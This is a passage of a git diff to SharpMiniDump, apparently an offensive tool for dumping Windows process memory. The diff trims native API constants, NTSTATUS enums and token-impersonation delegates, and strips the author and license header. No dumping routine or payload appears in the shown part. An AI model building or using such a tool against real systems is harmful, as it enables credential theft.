IntPtr hToken); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool RevertToSelf(); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate Boolean ImpersonateLoggedOnUser(IntPtr hToken); - [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 
@@ -408,9 +209,6 @@ public delegate int LdrLoadDll(IntPtr PathToFile, [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] public delegate int PssCaptureSnapshot(IntPtr ProcessHandle, PSS_CAPTURE_FLAGS CaptureFlags, int ThreadContextFlags, ref IntPtr SnapshotHandle); - - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool MyMiniDumpWriteDumpCallback(IntPtr CallbackParam, IntPtr CallbackInput, IntPtr CallbackOutput); } } } diff --git a/SharpMiniDump/Natives.cs b/SharpMiniDump/Natives.cs index 02fb9e7..e6ae7c8 100644 --- a/SharpMiniDump/Natives.cs +++ b/SharpMiniDump/Natives.cs 
@@ -1,41 +1,25 @@ -// -// Author: B4rtik (@b4rtik) -// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump) -// License: BSD 3-Clause -// - -using System; +using System; using System.Runtime.InteropServices; namespace SharpMiniDump { class Natives { + public const int FILE_MAP_READ = 0x0004; public const int FILE_READ_DATA = 0x0001; // file & pipe - public const int FILE_LIST_DIRECTORY = 0x0001; // directory public const int FILE_WRITE_DATA = 0x0002; // file & pipe - public const int FILE_ADD_FILE = 0x0002; // directory public const int FILE_APPEND_DATA = 0x0004; // file - public const int FILE_ADD_SUBDIRECTORY = 0x0004; // directory - public const int FILE_CREATE_PIPE_INSTANCE = 0x0004; // named pipe public const int FILE_READ_EA = 0x0008; // file & directory public const int FILE_WRITE_EA = 0x0010; // file & directory - public const int FILE_EXECUTE = 0x0020; // file - public const int FILE_TRAVERSE = 0x0020; // directory - public const int FILE_DELETE_CHILD = 0x0040; // directory public const int FILE_READ_ATTRIBUTES = 0x0080; // all public const int FILE_WRITE_ATTRIBUTES = 0x0100; // all public const int FILE_OVERWRITE_IF = 0x00000005; public const int FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020; + public const int MAXIMUM_ALLOWED = 0x02000000; public const long READ_CONTROL = 0x00020000; public const long SYNCHRONIZE = 0x00100000; public const long STANDARD_RIGHTS_WRITE = READ_CONTROL; - public const long STANDARD_RIGHTS_EXECUTE = READ_CONTROL; - public const long STANDARD_RIGHTS_ALL = 0x001F0000; - - public const long SPECIFIC_RIGHTS_ALL = 0x0000FFFF; - public const long FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF; public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000; public const UInt32 STANDARD_RIGHTS_READ = 0x00020000; 
@@ -48,12 +32,10 @@ class Natives public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040; public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080; public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100; - public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY); public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID); - public const UInt32 TOKEN_ALT = (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY); public const UInt32 SE_PRIVILEGE_ENABLED = 0x2; 
@@ -69,59 +51,8 @@ class Natives FILE_WRITE_EA | FILE_APPEND_DATA | SYNCHRONIZE; - - public const long FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE | - FILE_READ_ATTRIBUTES | - FILE_EXECUTE | - SYNCHRONIZE; - - public const int FILE_SHARE_READ = 0x00000001; - public const int FILE_SHARE_WRITE = 0x00000002; - public const int FILE_SHARE_DELETE = 0x00000004; - public const int FILE_ATTRIBUTE_READONLY = 0x00000001; - public const int FILE_ATTRIBUTE_HIDDEN = 0x00000002; - public const int FILE_ATTRIBUTE_SYSTEM = 0x00000004; - public const int FILE_ATTRIBUTE_DIRECTORY = 0x00000010; - public const int FILE_ATTRIBUTE_ARCHIVE = 0x00000020; - public const int FILE_ATTRIBUTE_DEVICE = 0x00000040; + public const int FILE_ATTRIBUTE_NORMAL = 0x00000080; - public const int FILE_ATTRIBUTE_TEMPORARY = 0x00000100; - public const int FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200; - public const int FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400; - public const int FILE_ATTRIBUTE_COMPRESSED = 0x00000800; - public const int FILE_ATTRIBUTE_OFFLINE = 0x00001000; - public const int FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000; - public const int FILE_ATTRIBUTE_ENCRYPTED = 0x00004000; - public const int FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001; - public const int FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002; - public const int FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004; - public const int FILE_NOTIFY_CHANGE_SIZE = 0x00000008; - public const int FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010; - public const int FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020; - public const int FILE_NOTIFY_CHANGE_CREATION = 0x00000040; - public const int FILE_NOTIFY_CHANGE_SECURITY = 0x00000100; - public const int FILE_ACTION_ADDED = 0x00000001; - public const int FILE_ACTION_REMOVED = 0x00000002; - public const int FILE_ACTION_MODIFIED = 0x00000003; - public const int FILE_ACTION_RENAMED_OLD_NAME = 0x00000004; - public const int FILE_ACTION_RENAMED_NEW_NAME = 0x00000005; - public const int MAILSLOT_NO_MESSAGE = -1; - 
public const int MAILSLOT_WAIT_FOREVER = -1; - public const int FILE_CASE_SENSITIVE_SEARCH = 0x00000001; - public const int FILE_CASE_PRESERVED_NAMES = 0x00000002; - public const int FILE_UNICODE_ON_DISK = 0x00000004; - public const int FILE_PERSISTENT_ACLS = 0x00000008; - public const int FILE_FILE_COMPRESSION = 0x00000010; - public const int FILE_VOLUME_QUOTAS = 0x00000020; - public const int FILE_SUPPORTS_SPARSE_FILES = 0x00000040; - public const int FILE_SUPPORTS_REPARSE_POINTS = 0x00000080; - public const int FILE_SUPPORTS_REMOTE_STORAGE = 0x00000100; - public const int FILE_VOLUME_IS_COMPRESSED = 0x00008000; - public const int FILE_SUPPORTS_OBJECT_IDS = 0x00010000; - public const int FILE_SUPPORTS_ENCRYPTION = 0x00020000; - public const int FILE_NAMED_STREAMS = 0x00040000; - public const int FILE_READ_ONLY_VOLUME = 0x00080000; - public const int CREATE_ALWAYS = 2; public struct WIN_VER_INFO { @@ -149,9 +80,7 @@ public struct OSVERSIONINFOEXW public byte wProductType; public byte wReserved; } - - - + [StructLayout(LayoutKind.Sequential)] public struct LARGE_INTEGER { 
@@ -167,45 +96,6 @@ public struct UNICODE_STRING
 public IntPtr Buffer;
 }
- [StructLayout(LayoutKind.Sequential)]
- public struct SYSTEM_PROCESSES
- {
- public int NextEntryOffset;
- public int NumberOfThreads;
- public LARGE_INTEGER WorkingSetPrivateSize;
- public uint HardFaultCount;
- public uint NumberOfThreadsHighWatermark;
- public ulong CycleTime;
- public long CreateTime;
- public long UserTime;
- public long KernelTime;
- public UNICODE_STRING ImageName;
- public int BasePriority;
- public IntPtr UniqueProcessId;
- public IntPtr InheritedFromUniqueProcessId;
- public int HandleCount;
- public int SessionId;
- public IntPtr UniqueProcessKey;
- public IntPtr PeakVirtualSize;
- public IntPtr VirtualSize;
- public uint PageFaultCount;
- public IntPtr PeakWorkingSetSize;
- public IntPtr WorkingSetSize;
- public IntPtr QuotaPeakPagedPoolUsage;
- public IntPtr QuotaPagedPoolUsage;
- public IntPtr QuotaPeakNonPagedPoolUsage;
- public IntPtr QuotaNonPagedPoolUsage;
- public IntPtr PagefileUsage;
- public IntPtr PeakPagefileUsage;
- public IntPtr PrivatePageCount;
- public LARGE_INTEGER ReadOperationCount;
- public LARGE_INTEGER WriteOperationCount;
- public LARGE_INTEGER OtherOperationCount;
- public LARGE_INTEGER ReadTransferCount;
- public LARGE_INTEGER WriteTransferCount;
- public LARGE_INTEGER OtherTransferCount;
- }
-
 [StructLayout(LayoutKind.Sequential)]
 public struct LUID_AND_ATTRIBUTES
 {
@@ -272,498 +162,7 @@ public struct OBJECT_ATTRIBUTES
 public enum NTSTATUS : uint
 {
 // Success
- Success = 0x00000000,
- Wait0 = 0x00000000,
- Wait1 = 0x00000001,
- Wait2 = 0x00000002,
- Wait3 = 0x00000003,
- Wait63 = 0x0000003f,
- Abandoned = 0x00000080,
- AbandonedWait0 = 0x00000080,
- AbandonedWait1 = 0x00000081,
- AbandonedWait2 = 0x00000082,
- AbandonedWait3 = 0x00000083,
- AbandonedWait63 = 0x000000bf,
- UserApc = 0x000000c0,
- KernelApc = 0x00000100,
- Alerted = 0x00000101,
- Timeout = 0x00000102,
- Pending = 0x00000103,
- Reparse = 0x00000104,
- MoreEntries = 0x00000105,
- NotAllAssigned = 0x00000106,
- SomeNotMapped = 0x00000107,
- OpLockBreakInProgress = 0x00000108,
- VolumeMounted = 0x00000109,
- RxActCommitted = 0x0000010a,
- NotifyCleanup = 0x0000010b,
- NotifyEnumDir = 0x0000010c,
- NoQuotasForAccount = 0x0000010d,
- PrimaryTransportConnectFailed = 0x0000010e,
- PageFaultTransition = 0x00000110,
- PageFaultDemandZero = 0x00000111,
- PageFaultCopyOnWrite = 0x00000112,
- PageFaultGuardPage = 0x00000113,
- PageFaultPagingFile = 0x00000114,
- CrashDump = 0x00000116,
- ReparseObject = 0x00000118,
- NothingToTerminate = 0x00000122,
- ProcessNotInJob = 0x00000123,
- ProcessInJob = 0x00000124,
- ProcessCloned = 0x00000129,
- FileLockedWithOnlyReaders = 0x0000012a,
- FileLockedWithWriters = 0x0000012b,
-
- // Informational
- Informational = 0x40000000,
- ObjectNameExists = 0x40000000,
- ThreadWasSuspended = 0x40000001,
- WorkingSetLimitRange = 0x40000002,
- ImageNotAtBase = 0x40000003,
- RegistryRecovered = 0x40000009,
-
- // Warning
- Warning = 0x80000000,
- GuardPageViolation = 0x80000001,
- DatatypeMisalignment = 0x80000002,
- Breakpoint = 0x80000003,
- SingleStep = 0x80000004,
- BufferOverflow = 0x80000005,
- NoMoreFiles = 0x80000006,
- HandlesClosed = 0x8000000a,
- PartialCopy = 0x8000000d,
- DeviceBusy = 0x80000011,
- InvalidEaName = 0x80000013,
- EaListInconsistent = 0x80000014,
- NoMoreEntries = 0x8000001a,
- LongJump = 0x80000026,
- DllMightBeInsecure = 0x8000002b,
-
- // Error
- Error = 0xc0000000,
- Unsuccessful = 0xc0000001,
- NotImplemented = 0xc0000002,
- InvalidInfoClass = 0xc0000003,
- InfoLengthMismatch = 0xc0000004,
- AccessViolation = 0xc0000005,
- InPageError = 0xc0000006,
- PagefileQuota = 0xc0000007,
- InvalidHandle = 0xc0000008,
- BadInitialStack = 0xc0000009,
- BadInitialPc = 0xc000000a,
- InvalidCid = 0xc000000b,
- TimerNotCanceled = 0xc000000c,
- InvalidParameter = 0xc000000d,
- NoSuchDevice = 0xc000000e,
- NoSuchFile = 0xc000000f,
- InvalidDeviceRequest = 0xc0000010,
- EndOfFile = 0xc0000011,
- WrongVolume = 0xc0000012,
- NoMediaInDevice = 0xc0000013,
- NoMemory = 0xc0000017,
- ConflictingAddresses = 0xc0000018,
- NotMappedView = 0xc0000019,
- UnableToFreeVm = 0xc000001a,
- UnableToDeleteSection = 0xc000001b,
- IllegalInstruction = 0xc000001d,
- AlreadyCommitted = 0xc0000021,
- AccessDenied = 0xc0000022,
- BufferTooSmall = 0xc0000023,
- ObjectTypeMismatch = 0xc0000024,
- NonContinuableException = 0xc0000025,
- BadStack = 0xc0000028,
- NotLocked = 0xc000002a,
- NotCommitted = 0xc000002d,
- InvalidParameterMix = 0xc0000030,
- ObjectNameInvalid = 0xc0000033,
- ObjectNameNotFound = 0xc0000034,
- ObjectNameCollision = 0xc0000035,
- ObjectPathInvalid = 0xc0000039,
- ObjectPathNotFound = 0xc000003a,
- ObjectPathSyntaxBad = 0xc000003b,
- DataOverrun = 0xc000003c,
- DataLate = 0xc000003d,
- DataError = 0xc000003e,
- CrcError = 0xc000003f,
- SectionTooBig = 0xc0000040,
- PortConnectionRefused = 0xc0000041,
- InvalidPortHandle = 0xc0000042,
- SharingViolation = 0xc0000043,
- QuotaExceeded = 0xc0000044,
- InvalidPageProtection = 0xc0000045,
- MutantNotOwned = 0xc0000046,
- SemaphoreLimitExceeded = 0xc0000047,
- PortAlreadySet = 0xc0000048,
- SectionNotImage = 0xc0000049,
- SuspendCountExceeded = 0xc000004a,
- ThreadIsTerminating = 0xc000004b,
- BadWorkingSetLimit = 0xc000004c,
- IncompatibleFileMap = 0xc000004d,
- SectionProtection = 0xc000004e,
- EasNotSupported = 0xc000004f,
- EaTooLarge = 0xc0000050,
- NonExistentEaEntry = 0xc0000051,
- NoEasOnFile = 0xc0000052,
- EaCorruptError = 0xc0000053,
- FileLockConflict = 0xc0000054,
- LockNotGranted = 0xc0000055,
- DeletePending = 0xc0000056,
- CtlFileNotSupported = 0xc0000057,
- UnknownRevision = 0xc0000058,
- RevisionMismatch = 0xc0000059,
- InvalidOwner = 0xc000005a,
- InvalidPrimaryGroup = 0xc000005b,
- NoImpersonationToken = 0xc000005c,
- CantDisableMandatory = 0xc000005d,
- NoLogonServers = 0xc000005e,
- NoSuchLogonSession = 0xc000005f,
- NoSuchPrivilege = 0xc0000060,
- PrivilegeNotHeld = 0xc0000061,
- InvalidAccountName = 0xc0000062,
- UserExists = 0xc0000063,
- NoSuchUser = 0xc0000064,
- GroupExists = 0xc0000065,
- NoSuchGroup = 0xc0000066,
- MemberInGroup = 0xc0000067,
- MemberNotInGroup = 0xc0000068,
- LastAdmin = 0xc0000069,
- WrongPassword = 0xc000006a,
- IllFormedPassword = 0xc000006b,
- PasswordRestriction = 0xc000006c,
- LogonFailure = 0xc000006d,
- AccountRestriction = 0xc000006e,
- InvalidLogonHours = 0xc000006f,
- InvalidWorkstation = 0xc0000070,
- PasswordExpired = 0xc0000071,
- AccountDisabled = 0xc0000072,
- NoneMapped = 0xc0000073,
- TooManyLuidsRequested = 0xc0000074,
- LuidsExhausted = 0xc0000075,
- InvalidSubAuthority = 0xc0000076,
- InvalidAcl = 0xc0000077,
- InvalidSid = 0xc0000078,
- InvalidSecurityDescr = 0xc0000079,
- ProcedureNotFound = 0xc000007a,
- InvalidImageFormat = 0xc000007b,
- NoToken = 0xc000007c,
- BadInheritanceAcl = 0xc000007d,
- RangeNotLocked = 0xc000007e,
- DiskFull = 0xc000007f,
- ServerDisabled = 0xc0000080,
- ServerNotDisabled = 0xc0000081,
- TooManyGuidsRequested = 0xc0000082,
- GuidsExhausted = 0xc0000083,
- InvalidIdAuthority = 0xc0000084,
- AgentsExhausted = 0xc0000085,
- InvalidVolumeLabel = 0xc0000086,
- SectionNotExtended = 0xc0000087,
- NotMappedData = 0xc0000088,
- ResourceDataNotFound = 0xc0000089,
- ResourceTypeNotFound = 0xc000008a,
- ResourceNameNotFound = 0xc000008b,
- ArrayBoundsExceeded = 0xc000008c,
- FloatDenormalOperand = 0xc000008d,
- FloatDivideByZero = 0xc000008e,
- FloatInexactResult = 0xc000008f,
- FloatInvalidOperation = 0xc0000090,
- FloatOverflow = 0xc0000091,
- FloatStackCheck = 0xc0000092,
- FloatUnderflow = 0xc0000093,
- IntegerDivideByZero = 0xc0000094,
- IntegerOverflow = 0xc0000095,
- PrivilegedInstruction = 0xc0000096,
- TooManyPagingFiles = 0xc0000097,
- FileInvalid = 0xc0000098,
- InstanceNotAvailable = 0xc00000ab,
- PipeNotAvailable = 0xc00000ac,
- InvalidPipeState = 0xc00000ad,
- PipeBusy = 0xc00000ae,
- IllegalFunction = 0xc00000af,
- PipeDisconnected = 0xc00000b0,
- PipeClosing = 0xc00000b1,
- PipeConnected = 0xc00000b2,
- PipeListening = 0xc00000b3,
- InvalidReadMode = 0xc00000b4,
- IoTimeout = 0xc00000b5,
- FileForcedClosed = 0xc00000b6,
- ProfilingNotStarted = 0xc00000b7,
- ProfilingNotStopped = 0xc00000b8,
- NotSameDevice = 0xc00000d4,
- FileRenamed = 0xc00000d5,
- CantWait = 0xc00000d8,
- PipeEmpty = 0xc00000d9,
- CantTerminateSelf = 0xc00000db,
- InternalError = 0xc00000e5,
- InvalidParameter1 = 0xc00000ef,
- InvalidParameter2 = 0xc00000f0,
- InvalidParameter3 = 0xc00000f1,
- InvalidParameter4 = 0xc00000f2,
- InvalidParameter5 = 0xc00000f3,
- InvalidParameter6 = 0xc00000f4,
- InvalidParameter7 = 0xc00000f5,
- InvalidParameter8 = 0xc00000f6,
- InvalidParameter9 = 0xc00000f7,
- InvalidParameter10 = 0xc00000f8,
- InvalidParameter11 = 0xc00000f9,
- InvalidParameter12 = 0xc00000fa,
- MappedFileSizeZero = 0xc000011e,
- TooManyOpenedFiles = 0xc000011f,
- Cancelled = 0xc0000120,
- CannotDelete = 0xc0000121,
- InvalidComputerName = 0xc0000122,
- FileDeleted = 0xc0000123,
- SpecialAccount = 0xc0000124,
- SpecialGroup = 0xc0000125,
- SpecialUser = 0xc0000126,
- MembersPrimaryGroup = 0xc0000127,
- FileClosed = 0xc0000128,
- TooManyThreads = 0xc0000129,
- ThreadNotInProcess = 0xc000012a,
- TokenAlreadyInUse = 0xc000012b,
- PagefileQuotaExceeded = 0xc000012c,
- CommitmentLimit = 0xc000012d,
- InvalidImageLeFormat = 0xc000012e,
- InvalidImageNotMz = 0xc000012f,
- InvalidImageProtect = 0xc0000130,
- InvalidImageWin16 = 0xc0000131,
- LogonServer = 0xc0000132,
- DifferenceAtDc = 0xc0000133,
- SynchronizationRequired = 0xc0000134,
- DllNotFound = 0xc0000135,
- IoPrivilegeFailed = 0xc0000137,
- OrdinalNotFound = 0xc0000138,
- EntryPointNotFound = 0xc0000139,
- ControlCExit = 0xc000013a,
- PortNotSet = 0xc0000353,
- DebuggerInactive = 0xc0000354,
- CallbackBypass = 0xc0000503,
- PortClosed = 0xc0000700,
- MessageLost = 0xc0000701,
- InvalidMessage = 0xc0000702,
- RequestCanceled = 0xc0000703,
- RecursiveDispatch = 0xc0000704,
- LpcReceiveBufferExpected = 0xc0000705,
- LpcInvalidConnectionUsage = 0xc0000706,
- LpcRequestsNotAllowed = 0xc0000707,
- ResourceInUse = 0xc0000708,
- ProcessIsProtected = 0xc0000712,
- VolumeDirty = 0xc0000806,
- FileCheckedOut = 0xc0000901,
- CheckOutRequired = 0xc0000902,
- BadFileType = 0xc0000903,
- FileTooLarge = 0xc0000904,
- FormsAuthRequired = 0xc0000905,
- VirusInfected = 0xc0000906,
- VirusDeleted = 0xc0000907,
- TransactionalConflict = 0xc0190001,
- InvalidTransaction = 0xc0190002,
- TransactionNotActive = 0xc0190003,
- TmInitializationFailed = 0xc0190004,
- RmNotActive = 0xc0190005,
- RmMetadataCorrupt = 0xc0190006,
- TransactionNotJoined = 0xc0190007,
- DirectoryNotRm = 0xc0190008,
- CouldNotResizeLog = 0xc0190009,
- TransactionsUnsupportedRemote = 0xc019000a,
- LogResizeInvalidSize = 0xc019000b,
- RemoteFileVersionMismatch = 0xc019000c,
- CrmProtocolAlreadyExists = 0xc019000f,
- TransactionPropagationFailed = 0xc0190010,
- CrmProtocolNotFound = 0xc0190011,
- TransactionSuperiorExists = 0xc0190012,
- TransactionRequestNotValid = 0xc0190013,
- TransactionNotRequested = 0xc0190014,
- TransactionAlreadyAborted = 0xc0190015,
- TransactionAlreadyCommitted = 0xc0190016,
- TransactionInvalidMarshallBuffer = 0xc0190017,
- CurrentTransactionNotValid = 0xc0190018,
- LogGrowthFailed = 0xc0190019,
- ObjectNoLongerExists = 0xc0190021,
- StreamMiniversionNotFound = 0xc0190022,
- StreamMiniversionNotValid = 0xc0190023,
- MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
- CantOpenMiniversionWithModifyIntent = 0xc0190025,
- CantCreateMoreStreamMiniversions = 0xc0190026,
- HandleNoLongerValid = 0xc0190028,
- NoTxfMetadata = 0xc0190029,
- LogCorruptionDetected = 0xc0190030,
- CantRecoverWithHandleOpen = 0xc0190031,
- RmDisconnected = 0xc0190032,
- EnlistmentNotSuperior = 0xc0190033,
- RecoveryNotNeeded = 0xc0190034,
- RmAlreadyStarted = 0xc0190035,
- FileIdentityNotPersistent = 0xc0190036,
- CantBreakTransactionalDependency = 0xc0190037,
- CantCrossRmBoundary = 0xc0190038,
- TxfDirNotEmpty = 0xc0190039,
- IndoubtTransactionsExist = 0xc019003a,
- TmVolatile = 0xc019003b,
- RollbackTimerExpired = 0xc019003c,
- TxfAttributeCorrupt = 0xc019003d,
- EfsNotAllowedInTransaction = 0xc019003e,
- TransactionalOpenNotAllowed = 0xc019003f,
- TransactedMappingUnsupportedRemote = 0xc0190040,
- TxfMetadataAlreadyPresent = 0xc0190041,
- TransactionScopeCallbacksNotSet = 0xc0190042,
- TransactionRequiredPromotion = 0xc0190043,
- CannotExecuteFileInTransaction = 0xc0190044,
- TransactionsNotFrozen = 0xc0190045,
-
- MaximumNtStatus = 0xffffffff
- }
-
- public enum SYSTEM_INFORMATION_CLASS
- {
- SystemBasicInformation = 0x0000,
- SystemProcessorInformation = 0x0001,
- SystemPerformanceInformation = 0x0002,
- SystemTimeOfDayInformation = 0x0003,
- SystemPathInformation = 0x0004,
- SystemProcessInformation = 0x0005,
- SystemCallCountInformation = 0x0006,
- SystemDeviceInformation = 0x0007,
- SystemProcessorPerformanceInformation = 0x0008,
- SystemFlagsInformation = 0x0009,
- SystemCallTimeInformation = 0x000A,
- SystemModuleInformation = 0x000B,
- SystemLocksInformation = 0x000C,
- SystemStackTraceInformation = 0x000D,
- SystemPagedPoolInformation = 0x000E,
- SystemNonPagedPoolInformation = 0x000F,
- SystemHandleInformation = 0x0010,
- SystemObjectInformation = 0x0011,
- SystemPageFileInformation = 0x0012,
- SystemVdmInstemulInformation = 0x0013,
- SystemVdmBopInformation = 0x0014,
- SystemFileCacheInformation = 0x0015,
- SystemPoolTagInformation = 0x0016,
- SystemInterruptInformation = 0x0017,
- SystemDpcBehaviorInformation = 0x0018,
- SystemFullMemoryInformation = 0x0019,
- SystemLoadGdiDriverInformation = 0x001A,
- SystemUnloadGdiDriverInformation = 0x001B,
- SystemTimeAdjustmentInformation = 0x001C,
- SystemSummaryMemoryInformation = 0x001D,
- SystemMirrorMemoryInformation = 0x001E,
- SystemPerformanceTraceInformation = 0x001F,
- SystemCrashDumpInformation = 0x0020,
- SystemExceptionInformation = 0x0021,
- SystemCrashDumpStateInformation = 0x0022,
- SystemKernelDebuggerInformation = 0x0023,
- SystemContextSwitchInformation = 0x0024,
- SystemRegistryQuotaInformation = 0x0025,
- SystemExtendServiceTableInformation = 0x0026,
- SystemPrioritySeperation = 0x0027,
- SystemVerifierAddDriverInformation = 0x0028,
- SystemVerifierRemoveDriverInformation = 0x0029,
- SystemProcessorIdleInformation = 0x002A,
- SystemLegacyDriverInformation = 0x002B,
- SystemCurrentTimeZoneInformation = 0x002C,
- SystemLookasideInformation = 0x002D,
- SystemTimeSlipNotification = 0x002E,
- SystemSessionCreate = 0x002F,
- SystemSessionDetach = 0x0030,
- SystemSessionInformation = 0x0031,
- SystemRangeStartInformation = 0x0032,
- SystemVerifierInformation = 0x0033,
- SystemVerifierThunkExtend = 0x0034,
- SystemSessionProcessInformation = 0x0035,
- SystemLoadGdiDriverInSystemSpace = 0x0036,
- SystemNumaProcessorMap = 0x0037,
- SystemPrefetcherInformation = 0x0038,
- SystemExtendedProcessInformation = 0x0039,
- SystemRecommendedSharedDataAlignment = 0x003A,
- SystemComPlusPackage = 0x003B,
- SystemNumaAvailableMemory = 0x003C,
- SystemProcessorPowerInformation = 0x003D,
- SystemEmulationBasicInformation = 0x003E,
- SystemEmulationProcessorInformation = 0x003F,
- SystemExtendedHandleInformation = 0x0040,
- SystemLostDelayedWriteInformation = 0x0041,
- SystemBigPoolInformation = 0x0042,
- SystemSessionPoolTagInformation = 0x0043,
- SystemSessionMappedViewInformation = 0x0044,
- SystemHotpatchInformation = 0x0045,
- SystemObjectSecurityMode = 0x0046,
- SystemWatchdogTimerHandler = 0x0047,
- SystemWatchdogTimerInformation = 0x0048,
- SystemLogicalProcessorInformation = 0x0049,
- SystemWow64SharedInformationObsolete = 0x004A,
- SystemRegisterFirmwareTableInformationHandler = 0x004B,
- SystemFirmwareTableInformation = 0x004C,
- SystemModuleInformationEx = 0x004D,
- SystemVerifierTriageInformation = 0x004E,
- SystemSuperfetchInformation = 0x004F,
- SystemMemoryListInformation = 0x0050,
- SystemFileCacheInformationEx = 0x0051,
- SystemThreadPriorityClientIdInformation = 0x0052,
- SystemProcessorIdleCycleTimeInformation = 0x0053,
- SystemVerifierCancellationInformation = 0x0054,
- SystemProcessorPowerInformationEx = 0x0055,
- SystemRefTraceInformation = 0x0056,
- SystemSpecialPoolInformation = 0x0057,
- SystemProcessIdInformation = 0x0058,
- SystemErrorPortInformation = 0x0059,
- SystemBootEnvironmentInformation = 0x005A,
- SystemHypervisorInformation = 0x005B,
- SystemVerifierInformationEx = 0x005C,
- SystemTimeZoneInformation = 0x005D,
- SystemImageFileExecutionOptionsInformation = 0x005E,
- SystemCoverageInformation = 0x005F,
- SystemPrefetchPatchInformation = 0x0060,
- SystemVerifierFaultsInformation = 0x0061,
- SystemSystemPartitionInformation = 0x0062,
- SystemSystemDiskInformation = 0x0063,
- SystemProcessorPerformanceDistribution = 0x0064,
- SystemNumaProximityNodeInformation = 0x0065,
- SystemDynamicTimeZoneInformation = 0x0066,
- SystemCodeIntegrityInformation = 0x0067,
- SystemProcessorMicrocodeUpdateInformation = 0x0068,
- SystemProcessorBrandString = 0x0069,
- SystemVirtualAddressInformation = 0x006A,
- SystemLogicalProcessorAndGroupInformation = 0x006B,
- SystemProcessorCycleTimeInformation = 0x006C,
- SystemStoreInformation = 0x006D,
- SystemRegistryAppendString = 0x006E,
- SystemAitSamplingValue = 0x006F,
- SystemVhdBootInformation = 0x0070,
- SystemCpuQuotaInformation = 0x0071,
- SystemNativeBasicInformation = 0x0072,
- SystemErrorPortTimeouts = 0x0073,
- SystemLowPriorityIoInformation = 0x0074,
- SystemBootEntropyInformation = 0x0075,
- SystemVerifierCountersInformation = 0x0076,
- SystemPagedPoolInformationEx = 0x0077,
- SystemSystemPtesInformationEx = 0x0078,
- SystemNodeDistanceInformation = 0x0079,
- SystemAcpiAuditInformation = 0x007A,
- SystemBasicPerformanceInformation = 0x007B,
- SystemQueryPerformanceCounterInformation = 0x007C,
- SystemSessionBigPoolInformation = 0x007D,
- SystemBootGraphicsInformation = 0x007E,
- SystemScrubPhysicalMemoryInformation = 0x007F,
- SystemBadPageInformation = 0x0080,
- SystemProcessorProfileControlArea = 0x0081,
- SystemCombinePhysicalMemoryInformation = 0x0082,
- SystemEntropyInterruptTimingInformation = 0x0083,
- SystemConsoleInformation = 0x0084,
- SystemPlatformBinaryInformation = 0x0085,
- SystemThrottleNotificationInformation = 0x0086,
- SystemHypervisorProcessorCountInformation = 0x0087,
- SystemDeviceDataInformation = 0x0088,
- SystemDeviceDataEnumerationInformation = 0x0089,
- SystemMemoryTopologyInformation = 0x008A,
- SystemMemoryChannelInformation = 0x008B,
- SystemBootLogoInformation = 0x008C,
- SystemProcessorPerformanceInformationEx = 0x008D,
- SystemSpare0 = 0x008E,
- SystemSecureBootPolicyInformation = 0x008F,
- SystemPageFileInformationEx = 0x0090,
- SystemSecureBootInformation = 0x0091,
- SystemEntropyInterruptTimingRawInformation = 0x0092,
- SystemPortableWorkspaceEfiLauncherInformation = 0x0093,
- SystemFullProcessInformation = 0x0094,
- MaxSystemInfoClass = 0x0095
+ Success = 0x00000000
 }
 public struct TOKEN_ELEVATION
 {
@@ -814,13 +213,6 @@ public enum TOKEN_INFORMATION_CLASS
 TokenIsRestricted,
 MaxTokenInfoClass
 }
-
- public enum TOKEN_ELEVATION_TYPE
- {
- TokenElevationTypeDefault = 1,
- TokenElevationTypeFull,
- TokenElevationTypeLimited
- }
 public enum PSS_CAPTURE_FLAGS
 {
 PSS_CAPTURE_NONE,
@@ -889,64 +281,7 @@ public struct MINIDUMP_THREAD_EX_CALLBACK
 public ulong BackingStoreBase;
 public ulong BackingStoreEnd;
 }
-
- enum VS_FIXEDFILEINFO_FileFlags : uint
- {
- VS_FF_DEBUG = 0x00000001,
- VS_FF_INFOINFERRED = 0x00000010,
- VS_FF_PATCHED = 0x00000004,
- VS_FF_PRERELEASE = 0x00000002,
- VS_FF_PRIVATEBUILD = 0x00000008,
- VS_FF_SPECIALBUILD = 0x00000020
- }
-
- enum VS_FIXEDFILEINFO_FileOSFlags : uint
- {
- VOS_DOS = 0x00010000,
- VOS_NT = 0x00040000,
- VOS__WINDOWS16 = 0x00000001,
- VOS__WINDOWS32 = 0x00000004,
- VOS_OS216 = 0x00020000,
- VOS_OS232 = 0x00030000,
- VOS__PM16 = 0x00000002,
- VOS__PM32 = 0x00000003,
- VOS_UNKNOWN = 0x00000000
- }
-
- enum VS_FIXEDFILEINFO_FileTypeFlags : uint
- {
- VFT_APP = 0x00000001,
- VFT_DLL = 0x00000002,
